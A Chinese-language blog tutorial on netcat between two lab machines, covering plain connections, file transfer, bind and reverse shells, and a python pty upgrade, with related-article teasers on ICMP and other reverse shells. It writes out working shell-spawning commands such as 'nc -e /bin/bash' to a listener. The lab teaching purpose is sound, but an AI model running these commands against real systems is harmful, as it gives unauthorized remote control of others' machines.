使用NC命令反彈Shell

2021-09-12 14:13:25 字數 1919 閱讀 6650

本文使用兩台電腦操作,一台是kali(192.168.0.23),一台是mac(192.168.0.24)

有些電腦不支援,而且跟機器使用順序還有關係。

比如我在kali上(192.168.0.23)輸入:

root@kali:~# nc -l 1234
在mac上(192.168.0.24)輸入:

➜  ~ nc 192.168.0.23 1234
結果是無法連線。

然而我調換了順序之後,就可以連線了,很神奇:

kali:

root@kali:~# nc 192.168.0.24 1234

asddsa

mac:

➜  ~ nc -l 1234

asddsa

同樣的,先在mac上輸入,回車後等待:

➜  desktop nc -l 1234 > file

.......

在kali上輸入:

root@kali:~/desktop# nc 192.168.0.24 1234 < dns

.........

回到mac,檢視file檔案,已經傳輸過來了:

➜  desktop cat file@*

0000

001002

kali上輸入:

root@kali:~# nc -lvvp 7777 -e /bin/bash

listening on [any] 7777 ...

mac上輸入:

➜  ~ nc 192.168.0.23 7777
回車之後kali上顯示連線成功:

root@kali:~# nc -lvvp 7777 -e /bin/bash

listening on [any] 7777 ...

192.168.0.24: inverse host lookup failed: unknown host

connect to [192.168.0.23] from (unknown) [192.168.0.24] 58773

此時mac上使用ls命令,列出kali上的檔案資訊:

➜  ~ nc 192.168.0.23 7777

ls52.cn_ips.txt

52.com.cn_ips.txt

desktop

documents

downloads

.....

首先在mac上輸入:

➜  ~ nc -l 7777
然後再kali上輸入:

root@kali:~# nc -e /bin/bash 192.168.0.24 7777
此時回到mac,輸入ls即可檢視kali上檔案目錄:

➜  ~ nc -l 7777

ls52.cn_ips.txt

52.com.cn_ips.txt

desktop

documents

downloads

所以正向彈shell是在靶機上監聽埠,然後攻擊者鏈結

反向彈shell是在攻擊者電腦上監聽埠,然後靶機鏈結

如果確定靶機上安裝了python,即可使用python生成乙個標準shell:

nc連線上靶機之後首先輸入:

python -c "import pty;pty.spawn('/bin/bash')"

使用ICMP協議反彈shell

icmpsh是乙個簡單的反向icmp shell,與其他類似 shell的工具相比,他的主要優勢在於它不需要管理許可權即可執行到目標計算機上,畢竟icmp協議誰都可以用。準備兩台虛擬機器 kali.2020 192.168.244.128 windows server 2008 192.168.13...

nc 管道符的一種反彈shell姿勢

shell的姿勢有很多,網上師傅們也有整理了各種文章,知識面有多廣,姿勢就有多猥瑣,我就目前常見的簡單說一下 bash nc php python telnet ruby等,具體的使用方法網上都有就不細說了,下面說個我遇到的認為不錯的 shell的方法,nc linux中的管道符 shell,嗯,據...

反彈shell集錦

就是控制端監聽在某tcp udp埠,被控端發起請求到該埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的客戶端與服務端的角色反轉。通常用於被控端因防火牆受限 許可權不足 埠被占用等情形 假設我們攻擊了一台機器,開啟了該機器的...